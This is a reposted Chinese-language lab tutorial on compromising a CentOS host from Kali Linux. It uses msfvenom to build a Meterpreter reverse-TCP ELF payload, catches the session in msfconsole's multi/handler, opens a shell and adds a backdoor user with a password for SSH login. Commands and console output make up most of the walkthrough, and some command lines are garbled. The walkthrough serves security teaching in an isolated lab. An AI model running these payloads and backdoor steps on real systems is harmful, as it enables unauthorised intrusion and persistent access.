安基網 首頁 安全 滲透測試 查看內容

使用kali linux,利用Meterpreter成功滲透Linux主機并新建用戶

2019-9-23 11:47| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 前言Meterpreter作為滲透模塊有很多有用的功能,比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。之前的文章《利用Metasploi ...

前言

Meterpreter作為滲透模塊有很多有用的功能,比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。

之前的文章《利用Metasploit滲透框架生成payload遠程控制主機》展示了如何獲得一臺windows主機的控制權,今天我們來展示一下號稱非常安全的Linux是如何被入侵的。

正常的滲透步驟應該首先進行信息手機,對特點目標進行掃描,今天掠過其他步驟直接針對一臺主機進行滲透。

環境說明

控制端:kali linux 192.168.10.6

被控端:Centos7.6 192.168.10.10

兩臺主機同處于同一個局域網內,互相可以ping通。

在控制端生成payload程序

  • 尋找使用與linux主機的payload類型: "linux/x64/meterpreter/reverse_tcp"

以然使用linux主機meterpreter類型的反向tcp滲透控制程序。

#msfvenom -l payloads |grep 'linux/x64/meterpreter

  • 選擇好payload類型后,可以查看此payload可以使用的參數
msfvenom ﹑ linux/x64/meterpreter/reverse_tcp ┅list﹐ptions 

主要設置: LHOST和LPORT

  • 還要確定payload程序的輸出格式

linux主機選擇 “efl”格式

#[email protected]:~# msfvenom --list formats

  • 生成payload程序

lhost:本地主機(攻擊端)

lport:本地端口(攻擊端)

-p :指定攻擊載荷(遠程控制程序)類型。

-f:輸出的程序的類型,如elf/exe/apk等。

-o: 輸入位置。

msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.10.6 lport=6666 -f elf -o /root/pay.elf

加上可執行權限

  • 將payload程序(pay.elf)上傳到目標服務器

這個步驟是最關鍵的,也是最困難的。一般的黑客都會利用各種辦法將自己的木馬文件上傳到目標機器上。本次為了實驗效果直接用常規辦法上傳:scp。

開啟主控端進行控制

  • 進入msfconsole
[email protected]:~# msfconsole

  • 讓payload程序成功在被控端成功執行。(此處登錄被控端手動執行)
[[email protected] ~]# ./pay.elf &
[1] 6936
[[email protected] ~]# ps -fe |grep pay
root 6936 6897 0 19:18 pts/0 00:00:00 ./pay.elf
root 6962 6897 0 19:19 pts/0 00:00:00 grep --color=auto pay

  • 啟動控制端操作
  1. use exploit/multi/handler。使用handler
  2. 設置payload類型為反向tcp連接。
  3. 設置本地ip
  4. 設置本地端口
  5. 執行主控端:exploit。

看到“Meterpreter session 1 opened (192.168.10.6:6666 -> 192.168.10.10:49716)”表示成功連接上。

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.10.6
LHOST => 192.168.10.6
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.10.6:6666
[*] Sending stage (3021284 bytes) to 192.168.10.10
[*] Meterpreter session 1 opened (192.168.10.6:6666 -> 192.168.10.10:49716) at 2019-09-22 19:18:10 +0800
meterpreter >

滲透成功后的“黑客操作”

可以看都提示符編程了:“meterpreter >”

  • help

輸入help可以查看可以進行哪些操作,包括文件的查看、上傳、下載、新建、刪除等。

  • ls查看被控端文件:

執行ls可以查看到被控端的當前目錄文件:

和被控端主機上執行ls做對比:

  • 創建一個shell

執行一個“shell“命令可以開啟一個shell會話,在這里可以執行任何的被控端主機的linux命令:

  • 在被控端新建一個用戶:
meterpreter > shell
Process 6967 created.
Channel 1 created.



useradd teng
echo teng |passwd --stdin teng
更改用戶 teng 的密碼 。
passwd:所有的身份驗證令牌已經成功更新。

  • 驗證

在控制端再打開一個終端,用新建的用戶遠程登錄被控端:

成功登錄,大功告成!!

[email protected]:~# ssh [email protected]
[email protected]'s password:
Last failed login: Sun Sep 22 19:07:16 CST 2019 from 192.168.10.6 on ssh:notty
There were 3 failed login attempts since the last successful login.
[[email protected] ~]$ ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:4b:25:8c brd ff:ff:ff:ff:ff:ff
inet 192.168.10.10/24 brd 192.168.10.255 scope global dynamic ens33
valid_lft 1317sec preferred_lft 1317sec
inet6 fe80::20c:29ff:fe4b:258c/64 scope link
valid_lft forever preferred_lft forever



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6739456222426038795/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
创业如何赚钱